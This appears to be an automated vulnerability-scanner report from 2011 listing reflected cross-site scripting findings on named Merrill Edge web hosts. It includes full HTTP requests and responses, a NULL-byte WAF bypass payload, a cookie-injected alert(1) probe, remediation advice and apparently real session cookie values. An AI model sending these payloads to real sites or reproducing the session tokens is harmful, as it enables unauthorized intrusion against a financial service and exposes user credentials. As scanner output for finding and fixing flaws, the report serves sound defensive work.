This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=dTGW1OKP96ZWaYiqHpyXjmwGih/P6M4KNJl7BjKqNxZVvBmTMUiLl7vy5OU6W7vQx+Q3OlhYD6fR7JzCT4ENyMJHosxQ005rwDguhsrLIsy9P8FuzFjtfTXGwRTydUvo/3XF0IfvrKYy2FF1eIy/aOVyNYjo2hwAK/fY0M3F2rMEcjaLudR61/8av7j1HVfw8l1YT3+2QqLHHZNi8q26sYUl+aSjgjP0kT7mGmGbOGY1aYlPzDg+b7bp9xsB8pC1sPjCfkQ2flhBLs2rqT5kxrtQ9UZHLmR770tdTgquQIkqPgRVIJpP9Yw7qlEO0Cd4Xkyw65nXuMN5qvMFSB79shDrWD+dR6ZPuZDx9Lr2UwMKj4MLrPxmeukjr0etlj80ztv+wzFqwNNj5Ia4Buw7EKD7m1H5KxZz8ddFtjk5+eHbgA6pVwKWIctQxdOqL7KcFMuqBj/DBnBzzcXEyXTyL5Zt/RNlLwMh24ep1IYG3X+ked1D0+XSar0cP5S1YTspDtzpw6JovE7koEfRpqcJdC3MCyB+XPxB+kG9jirdZ+oVWD3P3bYw9YBGOayeqNmnRJl1fVHV140hUpkvZ1jntSXrV4z3Izx3d6VR0Vweg8xLjTf67EgdrHPuGUdkaO0N; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f
Set-Cookie: pxs=14a1ffa6d76642968f1b53551d28d1bb; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 77626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.95641';9ef12e8200f'
,'Page' : 'merrill-edge-advisory-center'
,'preview' : false
};
//]]>
...[SNIP]...

2.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /IRA/pages/home.aspx HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<![CDATA[
lpAddVars('page','section','Home');
lpAddVars('page','ConversionStage','Home');
lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c');
var cookieExists=false;Sys.Application.initialize();
Sys.Application.add_init(function() {
$create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:43:41 CST 2011.